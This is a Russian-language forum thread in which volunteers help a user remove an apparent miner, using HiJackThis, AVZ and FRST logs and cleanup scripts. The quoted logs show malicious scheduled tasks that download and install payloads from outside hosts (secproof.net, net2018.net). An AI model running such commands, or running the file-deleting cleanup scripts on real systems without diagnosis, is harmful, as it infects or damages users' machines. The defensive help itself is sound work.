Перейти к содержанию

svchost.exe 50% нагрузка на ЦП


Илья Болдырев

Рекомендуемые сообщения

Я уже не знаю, что делать. Пытаюсь забить в поисковике браузера какую нибудь программу, чтобы увидеть за что отвечает процесс svchost с ID 7500, но браузер тут же закрывается. Раньше с такими вирусами не сталкивался. Скорее всего, майнер. Прошу помочь. При запуске AutoLogger, появляется окошко и сразу закрывается. Никаких логов в папке нет.

Изменено пользователем Илья Болдырев
Ссылка на комментарий
Поделиться на другие сайты

Пробовали в безопасном режиме запустить автологгер?

Запустил каждую утилиту по отдельности и собрал их логи в один архив. Однако, когда пытаюсь открыть папку с AVZ, рабочий стол начинает мигать и вся папка со Сборщиком закрывается. И так каждый раз.

Пробовали в безопасном режиме запустить автологгер?

Также иногда открывается вкладка в браузере с рекламой казино...

Пробовали в безопасном режиме запустить автологгер?

Прошу прощения, надо было сразу в безопасном запускать. Вот архив с логами.

CollectionLog-2018.06.04-06.43.zip

Изменено пользователем Илья Болдырев
Ссылка на комментарий
Поделиться на другие сайты

Удалите Iobit через установку программ в панели упраления.

 

HiJackThis (из каталога autologger)профиксить

O9-32 - Button: HKLM\..\{e6be8e97-9343-42bd-9cfd-9e2e74db25d8} - (no name) - (no file)
O22 - Task: {59BF0B3A-D522-31FD-B4AF-52E1E6590D00} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://net2018.net/cl/?guid=o8r4g5otkyt3sbegs4g5e9vnpdh2ew2s&prid=1&pid=4_1009_0
O22 - Task: {C1A23778-BEE6-FD6A-6AC2-C3F497CF0758} - C:\WINDOWS\Yyye.exe /q /i http://secproof.net/6d37l5swnpoq.xyo
O22 - Task: {CDD5D8F9-A723-8352-C439-739EEBB1594D} - C:\Users\ilyad\AppData\Roaming\EELC.exe /q /i http://secproof.net/kynlkbkzzble.ajb
AVZ выполнить следующий скрипт.

Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\ilyad\AppData\Roaming\EELC.exe','');
 QuarantineFile('C:\WINDOWS\Yyye.exe','');
 DeleteFile('C:\WINDOWS\Yyye.exe','64');
 DeleteFile('C:\Users\ilyad\AppData\Roaming\EELC.exe','64');
 ExecuteFile('schtasks.exe', '/delete /TN "{C1A23778-BEE6-FD6A-6AC2-C3F497CF0758}" /F', 0, 15000, true); 
 ExecuteFile('schtasks.exe', '/delete /TN "{CDD5D8F9-A723-8352-C439-739EEBB1594D}" /F', 0, 15000, true); 
 ExecuteFile('schtasks.exe', '/delete /TN "{59BF0B3A-D522-31FD-B4AF-52E1E6590D00}" /F', 0, 15000, true); 
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
 ExecuteRepair(9);
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.

 

После перезагрузки:

- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.
quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.

1. В заголовке письма напишите "Запрос на исследование вредоносного файла".

2. В письме напишите "Выполняется запрос хэлпера".

3. Прикрепите файл карантина и нажмите "Отправить"

4. Полученный ответ сообщите здесь (с указанием номера KLAN)

 

- Подготовьте лог AdwCleaner и приложите его в теме.

Ссылка на комментарий
Поделиться на другие сайты

Профиксил HiJackThis. При удалении IObit, было сказано, что возможно данная программа уже удалена. AVZ смогу сделать только в безопасном режиме. При открытии ссылки "выполнить следующий скрипт" браузер закрывается. Тоже самое происходит при открытии ссылки "AdwCleaner".

Ссылка на комментарий
Поделиться на другие сайты

Профиксил HiJackThis. При удалении IObit, было сказано, что возможно данная программа уже удалена. AVZ смогу сделать только в безопасном режиме. При открытии ссылки "выполнить следующий скрипт" браузер закрывается. Тоже самое происходит при открытии ссылки "AdwCleaner".

выполните в безопасном режиме

Ссылка на комментарий
Поделиться на другие сайты

Выполнил все скрипты в AVZ. Однако, архив quarantine оказался пустой. Так должно быть? Выполнил сканирование через AdwCleaner. Вот логи.

AdwCleanerS00.txt

Ссылка на комментарий
Поделиться на другие сайты

возможно указанных файлов уже нет.

 

Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

Ссылка на комментарий
Поделиться на другие сайты

- Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".

    B92LqRQ.png

  • Нажмите кнопку Scan.
  • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
Ссылка на комментарий
Поделиться на другие сайты

Не используете больше одного антивируса в системе (Avast, Eset), удалите один из них. Иначе возможно проблемы с совместимостью.

  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

    CreateRestorePoint:
    CloseProcesses:
    CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    OPR Extension: (Tampermonkey) - C:\Users\ilyad\AppData\Roaming\Opera Software\Opera Stable\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2018-06-03]
    File: C:\WINDOWS\SysWOW64\Drivers\vduwodk5.sys
    File: C:\WINDOWS\system32\tcbres.wim
    File: C:\WINDOWS\system32\srms-apr.dat
    File: C:\WINDOWS\SysWOW64\srms-apr.dat
    2018-06-04 07:40 - 2017-12-21 17:04 - 000000000 ____D C:\Users\ilyad\AppData\LocalLow\IObit
    2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Users\Все пользователи\IObit
    2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Users\ilyad\AppData\Roaming\IObit
    2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\ProgramData\IObit
    2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Program Files (x86)\IObit
    Folder: C:\Users\ilyad\3D Objects
    File: C:\Users\ilyad\AppData\Roaming\ZVfNewAnyQaAG.exe
    2018-04-12 03:34 - 2018-04-12 03:34 - 000178688 ____N (Microsoft Corporation) C:\Users\ilyad\AppData\Roaming\ZVfNewAnyQaAG.exe
    File: C:\Users\ilyad\AppData\Local\WMI.ini
    AlternateDataStreams: C:\Users\Public\AppData:CSM [480]
    FirewallRules: [{1D21456D-6EBF-40BB-AF76-E0C82A419C40}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\AutoUpdate.exe
    FirewallRules: [{094B40ED-C0C4-49C2-A070-1BE203FEE6E8}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\AutoUpdate.exe
    FirewallRules: [{5E53A729-41A2-49A0-BA8E-4FED1E3EE49F}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DBDownloader.exe
    FirewallRules: [{3647FA04-A65E-421C-B5A0-2DE9B8D359E1}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DBDownloader.exe
    FirewallRules: [{3ACDFBAC-E5DD-4008-A882-35BB847799ED}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DriverBooster.exe
    FirewallRules: [{87EA0775-1AF5-4E16-B3F7-7D41DED2F8A7}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DriverBooster.exe
    Reboot:
    
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
Ссылка на комментарий
Поделиться на другие сайты

Лог-файл


Пользуюсь на данный момент только одним антивирусом (Avast), возможно, остались какие то файлы от ESET, так как раньше пользовался им.

Fixlog.txt

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • francesca555
      От francesca555
      Здравствуйте. Касперски (в тч Kaspersky Virus Removal Tool и еще пару программ использовала) в упор ничего не видит, но мне кажется, что компьютер заражен. Ноутбук намертво завис во время просмотра видео (дело точно не в нем), все пропало и осталась только иконка браузера (весь остальной экран был черный) пришлось перезагружать ноутбук, после этого экран загрузки как-то странно выглядел (как будто расширение неправильно выбрано), запустился вроде более менее нормально, но фон рабочего стола исчез, и вместо него черный экран. Через время перезагрузила еще раз, картинка вернулась на рабочий стол и начало происходить что-то очень странное. Я выделила несколько иконок и под ними пропал фон, при том, что в целом он оставался. Когда я продолжала выделять, фон постепенно пропадал. Я не стала до конца его убирать, но в итоге он сам пропал. При следующей загрузке ситуация повторилась, только наоборот. Рабочий стол загрузился черным, а как начала выделять, начал появляться... Я не исключаю, конечно, что не в вирусе дело, но я никогда такого не видела и в интернете ничего об этом не нашла. Как только открываю диспетчер задач, нагрузка цп падает с 40-75% до 7-15% + появились нетипичные подвисания и ноутбук сильно греется. В диспетчере задач нашла процесс svchost.exe, запущенный от имени пользователя. Если смотреть расположение файла, выдает Windows/System32/svchost.exe.

      Подскажите, пожалуйста, что делать в этой ситуации?
      CollectionLog-2025.01.28-09.19.zip
    • mallorik9
      От mallorik9
      Сижу в гугл хроме в простое видеокарта подскочила до 100%  сейчас пишу и опять 100% и за 5 сек падает до 0 смотрю через nvidia панель открываю диспетчер там нечего нет нагрузка но присутствует помогите пожалуйста незнаю что делать ps Отключал программой защитник пхд подхватил майнер
      Только что опять подскочило и упало на 5 сек 
          NVIDIA GeForce GTX 1050 Ti
          Версия драйвера:    32.0.15.7242
          Дата разработки:    12.02.2025
          Версия DirectX:    12 (FL 12.1)
          Физическое расположение:    PCI-шина 39, устройство 0, функция 0
          Использование    0%
          Выделенная память графического процессора    0,4/4,0 ГБ
          Общая память графического процессора    0,0/8,0 ГБ
          Оперативная память графического процессора    0,5/12,0 ГБ

    • mallorik9
      От mallorik9
      cижу в гугл хроме в простое видеокарта подскочила до 100%  сейчас пишу и опять 100% и за 5 сек падает до 0 смотрю через nvidia панель открываю диспетчер там нечего нет нагрузка но присутствует помогите пожалуйста незнаю что делать ps Отключал программой защитник пхд подхватил майнер
      Только что опять подскочило и упало на 5 сек 
        NVIDIA GeForce GTX 1050 Ti
          Версия драйвера:    32.0.15.7242
          Дата разработки:    12.02.2025
          Версия DirectX:    12 (FL 12.1)
          Физическое расположение:    PCI-шина 39, устройство 0, функция 0
          Использование    0%
          Выделенная память графического процессора    0,4/4,0 ГБ
          Общая память графического процессора    0,0/8,0 ГБ
          Оперативная память графического процессора    0,5/12,0 ГБ

      drweb только что просканировал нашол 2 вируса троян все ли это>?
      CollectionLog-2025.02.10-08.50.zip
    • yaphhy
      От yaphhy
      здравствуйте,
       
      при минимальном наборе приложений (хром, телеграм клиент, дискорд) загруженность ГП 30-50%
      при играх доходит до 99% и иногда БСОД
       
      возможно дело в goodbie-dpi от неизвестных авторов (качал с гит-хаба)
       
      проверки из статьи выполнил
      лог во вложении
      CollectionLog-2024.11.19-11.58.zip
    • Андрей_22222299
      От Андрей_22222299
      Здравствуйте.
      В простое на видеокарту идет нагрузка постоянная примерно 10%. Видно в HWMonitor и Диспетчере задач (в диспетчере видно нагрузку от "Процесс исполнения клиент-сервер" и "Диспетчер окон рабочего стола"). Если их свернуть нагрузка доходит до 20% или 50%, максимум до 80%. 
      Видеокарта нагревается до примерно 45-48 градусов. До этого в простое температура была 36 градусов. 
      На вирусы проверка ничего криминального не выявила 
      Отчет GSI прикрепил (одним архивом не помещается в 5 Мб, разделил содержимое на две части)
      GSI6_DESKTOP-1E2QTIL_Xaron_10_16_2024_14_28_41.zip
      Вот тут вторая часть отчета GSI
      GSI6_DESKTOP-1E2QTIL_Xaron_10_16_2024_14_28_41 (2).zip
×
×
  • Создать...